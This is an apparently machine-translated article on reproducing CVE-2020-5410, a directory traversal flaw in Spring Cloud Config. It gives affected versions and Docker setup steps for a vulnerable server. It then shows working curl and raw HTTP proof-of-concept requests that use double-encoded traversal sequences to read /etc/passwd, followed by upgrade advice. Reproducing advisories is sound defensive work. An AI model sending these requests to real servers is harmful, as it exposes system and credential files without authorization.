What about the reproduction of Spring Cloud Config directory traversal vulnerability CVE-2020-5410? 12/19 Update SLTechnology News&Howtos

What about the reproduction of Spring Cloud Config directory traversal vulnerability CVE-2020-5410?

2025-12-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Spring Cloud Config directory traversal vulnerability CVE-2020-5410 recurrence of how, I believe that many inexperienced people are helpless about this, for this reason this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Spring Cloud Config Directory Crossing Vulnerability

(CVE-2020-5410)

I. Brief introduction of vulnerability

Spring Cloud Config, version 2.2.x before 2.2.3, version 2.1.x before 2.1.9, and older unsupported versions allow applications to supply arbitrary configuration files via the spring-cloud-config-server module. Malicious users or attackers can send requests using crafted URLs, which could lead to directory traversal attacks.

II. Impact version

Spring Cloud Config: 2.2.0 to 2.2.2

Spring Cloud Config: 2.1.0 to 2.1.8

III. Vulnerability Environment & Vulnerability Recurrence

PoC:

curl "vulnerablemachine:port/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"

curl "127.0.0.1:8888/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"

docker environment deployment:

docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE

docker run -it --name=spring-cloud-config-server \

-p 8888:8888 \

hyness/spring-cloud-config-server:2.1.6.RELEASE \

--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo

Visit address: 192.168.0.110:8888/

Executive POC:

curl "192.168.0.110:8888/..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development"

Burp performs visits:

Detailed data package:

GET /..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252F..% 252Fetc%252Fpasswd%23foo/development HTTP/1.1

Host: 192.168.0.110:8888

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

System Execution Access Record:

IV. Suggestions for repair:

Upgrade to Spring Cloud Config to version 2.2.3 or 2.1.9 and place Spring-Cloud-Config-Server services on the intranet while using Spring Security for authentication. Download the latest version at github.com/spring-cloud/spring-cloud-config/releases

After reading the above content, do you know how to reproduce the Spring Cloud Config directory penetration vulnerability CVE-2020-5410? If you still want to learn more skills or want to know more related content, welcome to pay attention to the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.